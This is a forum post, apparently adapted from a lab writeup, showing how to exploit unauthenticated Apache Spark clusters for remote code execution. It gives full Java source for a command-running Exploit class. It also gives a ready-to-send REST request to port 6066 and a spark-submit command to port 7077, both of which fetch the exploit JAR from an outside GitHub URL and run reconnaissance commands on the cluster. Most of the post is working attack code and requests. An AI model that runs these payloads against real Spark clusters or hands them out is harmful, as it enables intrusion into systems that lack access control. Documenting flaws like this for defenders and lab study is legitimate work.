Jump to content

Title: Apache Spark Unauthorized Access Vulnerability

Featured Replies

Posted

Apache Spark 未授权访问漏洞

Apache Spark is a cluster computing system that supports users to submit applications to management nodes and distribute them to cluster execution. If the management node does not start ACL (Access Control), we will be able to execute arbitrary code in the cluster.

漏洞环境

Execute the following command to start an Apache Spark cluster in standalone mode, with a master and a slave in the cluster:

1

docker-compose up -d

After the environment is started, visit http://your-ip:8080 to see the master's management page, and visit http://your-ip:8081 to see the slave's management page.

漏洞利用

The essence of this vulnerability is that an unauthorized user can submit an application to the management node, which is actually malicious code.

There are two ways to submit:

Leverage REST API

Leverage submissions gateway (integrated in port 7077)

The application can be Java or Python, which is the simplest class

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

twenty one

twenty two

twenty three

twenty four

25

26

27

28

29

30

31

32

33

34

import java.io.BufferedReader;

import java.io.InputStreamReader;

public class Exploit {

public static void main(String[] args) throws Exception {

String[] cmds=args[0].split(',');

for (String cmd : cmds) {

System.out.println(cmd);

System.out.println(executeCommand(cmd.trim()));

System.out.println('==============================================');

}

}

//https://www.mkyong.com/java/how-to-execute-shell-command-from-java/

private static String executeCommand(String command) {

StringBuilder output=new StringBuilder();

try {

Process p=Runtime.getRuntime().exec(command);

p.waitFor();

BufferedReader reader=new BufferedReader(new InputStreamReader(p.getInputStream()));

String line;

while ((line=reader.readLine()) !=null) {

output.append(line).append('\n');

}

} catch (Exception e) {

e.printStackTrace();

}

return output.toString();

}

}

Compile it into a JAR and place it on either HTTP or FTP :

1

https://github.com/aRe00t/rce-over-spark/raw/master/Exploit.jar

In standalone mode, master will start an HTTP server on port 6066, and we submit a REST format API to this port:

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

twenty one

twenty two

twenty three

twenty four

25

26

27

28

29

30

POST /v1/submissions/create HTTP/1.1

Host: your-ip:6066

Accept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Content-Type: application/json

Connection: close

Content-Length: 680

{

'action': 'CreateSubmissionRequest',

'clientSparkVersion': '2.3.1',

'appArgs': [

'whoami,w,cat /proc/version,ifconfig,route,df -h,free -m,netstat -nltp,ps auxf'

],

'appResource': 'https://github.com/aRe00t/rce-over-spark/raw/master/Exploit.jar',

'environmentVariables': {

'SPARK_ENV_LOADED': '1'

},

'mainClass': 'Exploit',

'sparkProperties': {

'spark.jars': 'https://github.com/aRe00t/rce-over-spark/raw/master/Exploit.jar',

'spark.driver.supervise': 'false',

'spark.app.name': 'Exploit',

'spark.eventLog.enabled': 'true',

'spark.submit.deployMode': 'cluster',

'spark.master': 'spark://your-ip:6066'

}

}

Among them, spark.jars is the compiled application, mainClass is the class to be run, and appArgs is the parameter passed to the application.

20200323100150.png-water_print

The returned package has submissionId, and then visit http://your-ip:8081/logPage/?driverId={submissionId}logType=stdout to view the execution result:

20200323100312.png-water_print

Note that the application is submitted in the master, and the viewing result is in the slave where the application is executed (default port 8081). In actual combat, there may be multiple slaves.

用 REST API 方式提交应用:

If the 6066 port cannot be accessed or permission control is done, we can use the master's main port 7077 to submit the application.

The method is to use the script bin/spark-submit that comes with Apache Spark:

1

bin/spark-submit --master spark://your-ip:7077 --deploy-mode cluster --class Exploit https://github.com/aRe00t/rce-over-spark/raw/master/Exploit.jar id

If the master parameter you specify is rest server, this script will first try to submit the application using rest api; if it is found that it is not rest server, it will downgrade to using submission gateway to submit the application.

The way you view the results is consistent with the previous one.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

Important Information

HackTeam Cookie PolicyWe have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.